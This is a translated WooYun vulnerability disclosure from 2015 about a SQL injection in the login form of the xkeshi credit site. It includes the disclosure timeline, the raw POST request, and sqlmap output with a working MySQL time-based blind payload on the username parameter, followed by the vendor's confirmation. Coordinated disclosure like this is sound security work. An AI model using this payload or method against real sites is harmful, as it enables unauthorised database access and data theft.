WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2015-06-04: Details reported to the vendor, awaiting the vendor's handling
2015-06-05: Vendor confirmed the issue; details visible to the vendor only
2015-06-15: Details disclosed to core white hats and relevant domain experts
2015-06-25: Details disclosed to regular white hats
2015-07-05: Details disclosed to intern white hats
2015-07-20: Details disclosed to the public
[HD] In the name of the team, for the honour of the individual, building network security together
Injection point 2: http://credit.xkeshi.com/user/login;jsessionid=1wwfhwvdrff50v32yk1wdjd3b
The username parameter is placed into the SQL query without any filtering, which is what makes this injection possible. The POST request used:
POST /user/login HTTP/1.1
Host: credit.xkeshi.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://credit.xkeshi.com/user/login;jsessionid=1wwfhwvdrff50v32yk1wdjd3b
Cookie: Hm_lvt_e31fc7871d44b542d1441f0ac128e773=1433342223; Hm_lpvt_e31fc7871d44b542d1441f0ac128e773=1433342271; JSESSIONID=1uqib0bochj2tyz9aatxw7w17; Hm_lvt_0ebd3318f96e1f5b8259fc3cdc476d5a=1433342237; Hm_lpvt_0ebd3318f96e1f5b8259fc3cdc476d5a=1433342867
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

username=admin&password=admin
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 113 HTTP(s) requests:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=admin') AND (SELECT * FROM (SELECT(SLEEP(5)))zgPQ) AND ('lDWM'='lDWM&password=admin
---
[22:55:02] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.12
[22:55:02] [INFO] fetching database names
[22:55:02] [INFO] fetching number of databases
[22:55:02] [INFO] retrieved:
[22:55:02] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
1
[22:55:21] [INFO] adjusting time delay to 1 second due to good response times
7
[22:55:22] [INFO] retrieved: information_
Because of a dropped network connection and time constraints I did not continue dumping the databases, but it is the same database as in the previous vulnerability, 17 databases in both cases, so... you get the idea ( WooYun: 浙江爱客仕某站SQL注入 )
By the way, does the vendor send small gifts?
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-06-05 16:29
Thank you for your attention; we have assigned staff to fix this.
None yet